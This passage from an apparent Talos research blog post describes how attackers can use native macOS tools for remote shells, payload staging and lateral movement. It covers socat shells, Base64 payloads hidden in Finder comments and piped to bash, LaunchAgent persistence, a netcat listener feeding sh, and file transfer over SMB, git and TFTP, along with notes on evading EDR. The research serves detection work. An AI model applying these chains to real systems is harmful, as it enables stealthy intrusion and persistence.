the&#xA0;target.&#xA0;</span></figcaption></figure><p>From the attacking machine, connecting to the listener provides a fully interactive terminal:&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-8.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="394" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-8.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-8.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-8.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-8.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 8.&#xA0;Attacker&#xA0;connection to the&#xA0;socat&#xA0;listener.</span></figcaption></figure><p>On the target, the&#xA0;<code>reuseaddr,fork</code>&#xA0;options allow multiple connections and reuse of the port, while&#xA0;<code>pty,stderr</code>&#xA0;on the exec gives the connecting client a proper terminal with stderr output. On the sender side, <code>raw,echo=0,icanon=0</code>&#xA0;puts the local terminal into raw mode so that control characters and signals pass through to the remote shell correctly.&#xA0;</p><p>SSH is the de facto mechanism for gaining remote shell access on remote hosts, and as a result, it is where most detection engineering efforts are focused.&#xA0;<code>socat</code>&#xA0;achieves the same outcome, fully interactive terminal access, but&#xA0;operatesentirely outside the SSH ecosystem. There are no&#xA0;<code>sshd</code>&#xA0;logs, PAM authentication events, or&#xA0;&#x201C;authorized_keys&#x201D;&#xA0;to manage, which means detection pipelines built around SSH telemetry would not catch this activity.</p><h2 id="covert-data-transfer-finder-metadata-abuse">Covert&#xA0;data&#xA0;transfer: Finder&#xA0;metadata&#xA0;abuse&#xA0;</h2><p>A notable constraint of RAS is its inability to write file&#xA0;contents&#xA0;directly. To&#xA0;work around this, we can&#xA0;abuse&#xA0;the&#xA0;Finder Comment (&#x201C;kMDItemFinderComment&#x201D;)&#xA0;field, which is stored as Spotlight metadata.&#xA0;</p><h3 id="writing-payloads-to-finder-comments">Writing&#xA0;payloads to Finder Comments&#xA0;</h3><p>A notable constraint of RAS is its inability to&#xA0;write file&#xA0;contents&#xA0;directly. To circumvent this,&#xA0;threat actors can abuse&#xA0;the Finder Comment field (&#x201C;kMDItemFinderComment&#x201D;)&#xA0;&#x2014;&#xA0;a&#xA0;component&#xA0;of Spotlight metadata stored as an extended attribute. By storing a payload within metadata rather than the&#xA0;file&apos;s&#xA0;data fork,&#xA0;they&#xA0;can bypass&#xA0;traditional file-based security&#xA0;scanners&#xA0;and static analysis tools, which typically focus&#xA0;on executable code and script contents.&#xA0;</p><p>Because Finder is scriptable&#xA0;over RAS, the comment of a file on a remote machine can be set via the&#xA0;&#x201C;eppc://&#x201D;&#xA0;protocol. By Base64 encoding a payload locally, a multi-line script can be stored within this single string field. The&#xA0;<code>make new file</code>&#xA0;command handles the creation of the target file, ensuring that no pre-existing file&#xA0;is&#xA0;required:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-9.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="758" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-9.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-9.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-9.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-9.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 9.&#xA0;Setting Finder&#xA0;comments via RAE for&#xA0;payload&#xA0;staging.</span></figcaption></figure><p>The payload&#xA0;resides&#xA0;entirely within the Spotlight metadata, a location that&#xA0;remains&#xA0;largely unexamined&#xA0;by standard endpoint detection and response (EDR) solutions. This creates a stealthy staging area where malicious code can persist on the disk without triggering alerts associated with suspicious file contents.&#xA0;</p><h3 id="extraction-and-execution">Extraction and&#xA0;execution&#xA0;</h3><p>On the target, extraction and&#xA0;execution&#xA0;is&#xA0;a single line.&#xA0;<code>mdls</code>&#xA0;reads the comment, <code>base64 -D</code>&#xA0;decodes it, and the result is piped to&#xA0;&#x201C;bash&#x201D;:&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-10.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="1080" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-10.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-10.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-10.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-10.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 10.&#xA0;Extraction and&#xA0;execution of&#xA0;metadata-stored&#xA0;payloads.</span></figcaption></figure><h3 id="persistence-via-launchagent">Persistence via&#xA0;LaunchAgent&#xA0;</h3><p>This approach can be paired with a&#xA0;LaunchAgent&#xA0;for persistence. A&#xA0;plist&#xA0;in&#xA0;&#x201C;~/Library/LaunchAgents&#x201D;&#xA0;that executes the extraction chain at user login allows the payload to run automatically.&#xA0;</p><p>Our&#xA0;initial&#xA0;attempt using&#xA0;<code>mdls</code>&#xA0;inside the&#xA0;LaunchAgent&#xA0;failed because Spotlight may not be fully initialized when&#xA0;LaunchAgents&#xA0;fire. The fix was to replace&#xA0;<code>mdls</code>&#xA0;with&#xA0;<code>osascript</code>&#xA0;calling Finder directly to read the comment:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-11.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="1040" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-11.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-11.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-11.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-11.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 11.&#xA0;Persistence via&#xA0;LaunchAgent&#xA0;and Finder&#xA0;metadata.&#xA0;</span></figcaption></figure><p>Talos&#xA0;confirmed&#xA0;this successfully executes the payload at login. It is worth noting that macOS prompts the user to approve the bash execution at login, which is a visible indicator of background activity. The&#xA0;plist&#xA0;contains&#xA0;no payload, only a reference to metadata, so static analysis of the&#xA0;LaunchAgent&#xA0;would not reveal the malicious content.&#xA0;</p><h2 id="lateral-tool-transfer-techniques">Lateral&#xA0;Tool&#xA0;Transfer&#xA0;techniques&#xA0;</h2><p>Once&#xA0;attackers achieve execution,&#xA0;they&#xA0;must move their toolkit across the environment. Several native protocols were&#xA0;validated&#xA0;for tool transfer (T1570).&#xA0;</p><h3 id="standard-protocols-scp-and-sftp">Standard&#xA0;protocols: SCP&#xA0;and&#xA0;SFTP&#xA0;</h3><p>SCP (Secure Copy Protocol) and SFTP (SSH File Transfer Protocol) are the most straightforward methods,&#xA0;operating&#xA0;over SSH and available out-of-the-box on any macOS system with Remote Login enabled.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-12.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="362" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-12.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-12.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-12.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-12.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 12.&#xA0;SCP&#xA0;file&#xA0;transfer&#xA0;syntax.</span></figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-13.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="354" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-13.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-13.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-13.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-13.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 13.&#xA0;SFTP&#xA0;file&#xA0;transfer&#xA0;syntax.</span></figcaption></figure><h3 id="smb-based-transfer">SMB-based&#xA0;transfer&#xA0;</h3><p>Server Message Block (SMB) is a network file sharing protocol commonly associated with Windows environments, but macOS includes native support for both SMB client and server functionality. In a lateral movement context, an attacker can mount a remote SMB&#xA0;share&#xA0;and access its contents as if they were local files.&#xA0;</p><p>This method of setting up an SMB share on the victim requires SSH access. The following command creates a shared directory, loads the SMB daemon, and creates the share.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/carbon.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="434" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/carbon.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/carbon.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/carbon.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/carbon.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 14.&#xA0;Configuring a&#xA0;native SMB&#xA0;share on macOS.</span></figcaption></figure><p>With the share created, the next step is mounting it from the attacker machine. Attempting this action with the&#xA0;<code>mount</code>&#xA0;command failed due to an authentication error.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-15.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="516" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-15.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-15.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-15.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-15.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 15.&#xA0;Authentication&#xA0;error&#xA0;encountered&#xA0;during SMB&#xA0;mount.</span></figcaption></figure><p>To resolve this issue, GUI access to the victim machine was&#xA0;required. On the victim machine, navigate to System Settings &gt; General &gt; Sharing &gt; File Sharing &gt; Options. Located here is the option to store the user&apos;s account password on the computer. Even though this is labeled as &quot;Windows File Sharing&quot;, it was&#xA0;required&#xA0;to properly authenticate the user when using the mount utility.&#xA0;</p><p>However, this entire GUI dependency can be avoided by using&#xA0;<code>osascript</code>&#xA0;to mount the share instead of&#xA0;<code>mount</code>:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-16.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="354" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-16.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-16.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-16.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-16.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 16.&#xA0;Mounting SMB&#xA0;shares via&#xA0;osascript.</span></figcaption></figure><p>This mounts the share to&#xA0;&#x201C;/Volumes/share&#x201D;&#xA0;without requiring the GUI configuration step. With the share mounted, any&#xA0;file copied into the mount directory appears on the victim&#xA0;immediately.&#xA0;</p><h3 id="netcat-based-transfer">Netcat-based&#xA0;transfer&#xA0;</h3><p><code>nc</code>&#xA0;(netcat) is&#xA0;a well-known&#xA0;general-purpose networking utility that ships with macOS. It can be&#xA0;utilized&#xA0;to open arbitrary TCP and UDP connections, listen&#xA0;on&#xA0;ports, and pass data between them.&#xA0;</p><p>The simplest pattern involves piping commands directly into a&#xA0;netcat&#xA0;listener. On the target, a listener is&#xA0;established&#xA0;that pipes incoming data directly to&#xA0;<code>sh</code>:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-17.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="354" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-17.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-17.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-17.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-17.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 17.&#xA0;Netcat&#xA0;listener&#xA0;established&#xA0;on&#xA0;victim&#xA0;machine.</span></figcaption></figure><p>From the attacking machine, a command is then echoed into&#xA0;<code>nc</code>&#xA0;targeting the victim&apos;s IP and port:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-18.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="354" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-18.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-18.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-18.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-18.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 18.&#xA0;Command&#xA0;execution via&#xA0;Netcat&#xA0;(attacker&#xA0;side).</span></figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-19.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="556" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-19.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-19.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-19.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-19.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 19.&#xA0;Command&#xA0;execution via&#xA0;Netcat&#xA0;(victim&#xA0;side).</span></figcaption></figure><p>The attacker sends&#xA0;the&#xA0;<code>curl google.com</code>&#xA0;command over the wire, which is caught by the&#xA0;victim&apos;s&#xA0;listener and executed by&#xA0;<code>sh</code>. The resulting output confirms successful execution on the target.&#xA0;</p><p>Netcat&#xA0;can also&#xA0;facilitate&#xA0;file transfers through several different methods. An attacker could invoke a fetch to a remote system where a script or payload is&#xA0;hosted, or&#xA0;start a simple HTTP server on their own machine to perform ad hoc tool transfer.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-20.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="354" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-20.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-20.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-20.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-20.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 20.&#xA0;Serving&#xA0;files via&#xA0;netcat&#xA0;(Attacker Terminal 1).</span></figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-21.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="394" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-21.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-21.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-21.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-21.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 21.&#xA0;Initiating&#xA0;file&#xA0;transfer via&#xA0;Netcat&#xA0;(Attacker Terminal 2).</span></figcaption></figure><h3 id="git-based-transfer">Git-based&#xA0;transfer&#xA0;</h3><p><code>git</code>&#xA0;is a version control system ubiquitous in software development. Its prevalence on developer machines and reliance on SSH as a transport make&#xA0;<code>git push</code>&#xA0;a practical file transfer mechanism. The technique requires initializing a repository on the target and setting&#xA0;<code>receive.denyCurrentBranch&#xA0;updateInstead</code>.&#xA0;By default,&#xA0;<code>git</code>&#xA0;refuses&#xA0;pushes&#xA0;to a branch that is currently checked out on the remote. This setting overrides that behavior and updates the working tree on push, landing files on disk the moment the operation completes.&#xA0;</p><p>First, a receiving repository is initialized on the target over SSH:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-22.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="596" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-22.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-22.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-22.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-22.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 22.&#xA0;Initializing a Git&#xA0;repository on the&#xA0;target.</span></figcaption></figure><p>On the attacker, a local repository is created with the payload, and the remote is pointed at the target:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-23.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="596" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-23.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-23.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-23.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-23.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 23.&#xA0;Pushing&#xA0;payloads to the&#xA0;target via Git.&#xA0;</span></figcaption></figure><p>After the push,&#xA0;&#x201C;script.sh&#x201D;&#xA0;exists on the target at&#xA0;&#x201C;~/repos/project/script.sh&#x201D;.&#xA0;Additional&#xA0;file transfers only require adding new files, committing, and pushing again. Because&#xA0;<code>git</code>&#xA0;operates&#xA0;over SSH, the transfer is encrypted and uses the same authentication&#xA0;established&#xA0;for command execution.&#xA0;</p><h3 id="tftp-standard-and-unprivileged">TFTP (Standard and&#xA0;unprivileged)&#xA0;</h3><p>TFTP (Trivial File Transfer Protocol) is a lightweight, unauthenticated file transfer protocol that&#xA0;operates&#xA0;over UDP. macOS includes both a TFTP server and client. The server is not active by default but can be started through&#xA0;<code>launchd</code>.&#xA0;</p><p>With root access on the target, the system&apos;s built-in TFTP&#xA0;plist&#xA0;activates the server in a single command:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-24.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="354" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-24.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-24.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-24.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-24.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 24.&#xA0;Activating the&#xA0;native TFTP&#xA0;server.</span></figcaption></figure><p>This serves&#xA0;&#x201C;/private/tftpboot&#x201D;&#xA0;on the standard TFTP port (UDP 69). The TFTP system&#xA0;plist&#xA0;does not provide the&#xA0;<code>-w</code>&#xA0;flag to the&#xA0;<code>tftpd</code>&#xA0;process. Without it, the server only allows&#xA0;writes to&#xA0;files that already exist. A placeholder&#xA0;file must be created on the target for each file being transferred:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-25.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="394" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-25.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-25.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-25.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-25.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 25.&#xA0;Creating a&#xA0;placeholder&#xA0;file for TFTP&#xA0;transfer.</span></figcaption></figure><p>From the attacker, the payload is pushed to the target:&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-26.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="516" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-26.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-26.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-26.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-26.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 26.&#xA0;Pushing&#xA0;payload to&#xA0;target via TFTP.</span></figcaption></figure><p>In a post-exploitation scenario without root access,&#xA0;<code>tftpd</code>&#xA0;can still be deployed by loading a user-created&#xA0;plist&#xA0;from&#xA0;&#x201C;/tmp&#x201D;&#xA0;on a non-standard port. This variant passes the&#xA0;<code>tftpd&#xA0;-w</code>&#xA0;flag, which allows write requests to create new files, removing the placeholder requirement.&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-27.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="1926" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-27.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-27.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-27.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-27.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 27.&#xA0;Non-root TFTP&#xA0;server&#xA0;deployment.</span></figcaption></figure><h3 id="snmp-trap-based-transfer">SNMP&#xA0;trap-based&#xA0;transfer&#xA0;</h3><p>SNMP (Simple Network Management Protocol) is used for monitoring and managing network devices. SNMP traps are unsolicited notifications sent from agents to a management station over UDP port 162. The trap payload can carry arbitrary string data under custom OIDs, which can be repurposed as a data transfer channel. macOS ships with the 